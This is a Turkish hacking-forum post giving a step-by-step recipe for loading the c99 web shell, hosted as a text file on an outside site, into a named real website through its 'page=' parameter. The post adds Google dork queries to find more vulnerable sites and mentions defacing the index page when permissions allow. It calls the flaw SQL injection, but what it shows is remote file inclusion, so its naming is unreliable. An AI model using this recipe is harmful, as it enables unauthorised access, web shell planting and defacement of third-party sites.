sql enjeksiyon açığı

cartman

Katılımcı Üye
28 Ara 2005
932
17
zBjk
Arkadaş bazı php sitelerinde SQL enjeksiyonu ile html kodlarının çalıştırabildiğini göstermişti bana. benim de hemen aklıma bu açığı zehirin php versiyonu ile birleştirmek geldi.nasıl mı şöyle. örnek olarak aşağıdaki siteyi aldım. http://www.lkh.sk/index.php?page=
page= burdan sonra zehir.phpyi attığımız hostun adınız yazıyoruz. hosta txt şeklinde atmanız daha iyidir neyse. ben http://www.scottishmusicnetwork.co.uk/c99.txt buraya attım zehiri. adres çubuğuna şunu yazıyoruz.
http://www.lkh.sk/index.php?page=http://www.scottishmusicnetwork.co.uk/c99.txt
ve karşınıza ne çıkıyor. sanki siteye zehiri upload etmiş gibi sitenin dosyaları çıkıyor. eğer permissionlar açıksa siteye index atıyorsunuz.
ha bu arada bu tür siteleri bulmak için googlede şu şekilde arama yaptırcaksınız.

"inurl:index.php?page=news.php"
"inurl:index.php?page=info.php"

Anlamadığınız yerleri bu konu altında sorabilirsiniz.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.